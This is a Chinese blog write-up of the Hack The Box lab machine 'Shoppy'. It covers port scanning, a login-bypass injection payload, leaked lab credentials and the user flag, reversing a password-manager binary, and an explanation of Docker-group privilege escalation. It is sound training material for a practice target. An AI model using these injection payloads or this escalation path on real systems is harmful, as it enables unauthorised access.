[Meachines] [Easy] Shoppy Mattermost SQLi+逆向+Docker组权限提升-优快云博客

Tools

https://raw.githubusercontent.com/MartinxMax/FFbuster/refs/heads/main/ffbuster.sh

Information Gathering

IP Address	Opening Ports
10.10.11.180	TCP:22,80,9093

$ ip='10.10.11.180'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp   open  http     nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title:             Shoppy Wait Page        
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Sat, 01 Mar 2025 02:23:32 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 5
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 5
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.2252e-05
|     go_gc_duration_seconds{quantile="0.25"} 2.4987e-05
|_    go_gc_dur
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.93%I=7%D=3/1%Time=67C273C3%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,2A74,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Sat,\x20
SF:01\x20Mar\x202025\x2002:23:32\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_a
SF:utomatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x2
SF:0generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_a
SF:utomatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_t
SF:otal\x205\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\x2
SF:0of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20application\
SF:.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc_c
SF:ycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc_c
SF:ycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x20
SF:TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_tot
SF:al_gc_cycles_total\x205\n#\x20HELP\x20go_gc_duration_seconds\x20A\x20su
SF:mmary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collection\
SF:x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_dura
SF:tion_seconds{quantile=\"0\"}\x202\.2252e-05\ngo_gc_duration_seconds{qua
SF:ntile=\"0\.25\"}\x202\.4987e-05\ngo_gc_dur")%r(HTTPOptions,253A,"HTTP/1
SF:\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x2
SF:0charset=utf-8\r\nDate:\x20Sat,\x2001\x20Mar\x202025\x2002:23:32\x20GMT
SF:\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x2
SF:0of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20run
SF:time\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter\
SF:ngo_gc_cycles_automatic_gc_cycles_total\x205\n#\x20HELP\x20go_gc_cycles
SF:_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x20
SF:forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_forced_
SF:gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\n#
SF:\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\x2
SF:0completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycles
SF:_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x205\n#\x20HELP\x
SF:20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20durat
SF:ion\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_dura
SF:tion_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x202\.2
SF:252e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x202\.4987e-05\ngo_
SF:gc_dur");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Mattermost SQLi

# echo "10.10.11.180 shoppy.htb">>/etc/hosts

$ ./ffbuster.sh -u 'http://shoppy.htb' -i '10.10.11.180' -s /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt

http://shoppy.htb/login

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

username:admin' || 'X'=='X

http://shoppy.htb/admin/search-users?username=admin

http://shoppy.htb/admin/search-users?username=admin’;return%20’‘%20==%20’

password:remembermethisway

http://mattermost.shoppy.htb/login

username: jaeger
password: Sh0ppyBest@pp!

User.txt

8e835ecdb83ec826f7ac07dd4f18002c

Lateral Movement:RE

$ scp -r jaeger@10.10.11.180:/home/deploy/password-manager ./password-manager

获取用户端字符串与"Sample"密码做对比

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager

username: deploy
password: Deploying@pp!

Privilege Escalation：Docker Group Privilege Escalation

Docker 的守护进程（dockerd）需要以 root 用户权限运行，因此，能够与该守护进程通信的用户实际上拥有与 root 用户相当的权限。在大多数 Linux 系统中，docker 组的成员被授予与 Docker 守护进程通信的权限。这意味着，任何属于 docker 组的用户都可以执行 Docker 相关命令。